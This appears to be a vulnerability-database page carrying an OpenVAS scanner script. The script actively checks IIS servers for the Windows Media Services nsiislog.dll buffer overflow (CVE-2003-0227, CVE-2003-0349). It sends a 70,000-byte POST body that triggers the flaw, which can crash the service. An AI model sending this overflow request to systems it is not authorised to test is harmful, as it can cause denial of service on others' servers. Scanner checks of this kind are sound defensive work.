Lucene search

K
openvasCopyright (C) 2012 Greenbone AGOPENVAS:1361412562310802897
HistoryJul 25, 2012 - 12:00 a.m.

Microsoft Windows Media Services ISAPI Extension Code Execution Vulnerabilities - Active Check

2012-07-2500:00:00
Copyright (C) 2012 Greenbone AG
plugins.openvas.org
15

7.3 High

AI Score

Confidence

Low

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.962 High

EPSS

Percentile

99.5%

Microsoft Windows Media Services is prone to remote code execution vulnerabilities.

# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:microsoft:internet_information_services";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.802897");
  script_version("2023-10-10T05:05:41+0000");
  script_cve_id("CVE-2003-0227", "CVE-2003-0349");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2023-10-10 05:05:41 +0000 (Tue, 10 Oct 2023)");
  script_tag(name:"creation_date", value:"2012-07-25 16:04:16 +0530 (Wed, 25 Jul 2012)");
  script_name("Microsoft Windows Media Services ISAPI Extension Code Execution Vulnerabilities - Active Check");
  script_xref(name:"URL", value:"http://secunia.com/advisories/9115");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/7727");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/8035");
  script_xref(name:"URL", value:"http://secunia.com/advisories/8883");
  script_xref(name:"URL", value:"http://securitytracker.com/id?1007059");
  script_xref(name:"URL", value:"http://www.kb.cert.org/vuls/id/113716");
  script_xref(name:"URL", value:"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-019");
  script_xref(name:"URL", value:"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-022");
  script_xref(name:"URL", value:"http://support.microsoft.com/default.aspx?scid=kb;en-us;822343");
  script_category(ACT_DENIAL);
  script_tag(name:"qod_type", value:"remote_analysis");
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_family("Web Servers");
  script_dependencies("gb_microsoft_iis_http_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("IIS/installed");

  script_tag(name:"impact", value:"Successful exploitation could allow remote attackers to obtain sensitive
  information, execute arbitrary code or cause denial of service conditions.");

  script_tag(name:"affected", value:"- Microsoft Windows Media Services 4.0 and 4.1

  - Microsoft Windows NT 4.0

  - Microsoft Windows 2000");

  script_tag(name:"insight", value:"Windows Media Services logging capability for multicast transmissions is
  implemented as ISAPI extension (nsiislog.dll), which fails to processes
  incoming client or malicious HTTP requests.");

  script_tag(name:"solution", value:"The vendor has released updates. Please see the references for more information.");

  script_tag(name:"summary", value:"Microsoft Windows Media Services is prone to remote code execution vulnerabilities.");

  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");

if(!port = get_app_port(cpe:CPE, service:"www"))
  exit(0);

if(!get_app_location(port:port, cpe:CPE, nofork:TRUE))
  exit(0);

url = "/scripts/nsiislog.dll";
req = http_get(item: url, port: port);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

if(!res || ">NetShow ISAPI Log Dll" >!< res)
  exit(0);

postData = crap(data:"A", length:70000);

host = http_host_name(port:port);

req = string("POST ", url, " HTTP/1.1\r\n",
             "Host: ", host, "\r\n",
             "Content-Length: ", strlen(postData),
             "\r\n\r\n", postData);
res = http_send_recv(port:port, data:req);

if(res && res =~ "^HTTP/1\.[01] 500" &&
   "The remote procedure call failed" >< res && "<title>Error" >< res) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

exit(99);

7.3 High

AI Score

Confidence

Low

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.962 High

EPSS

Percentile

99.5%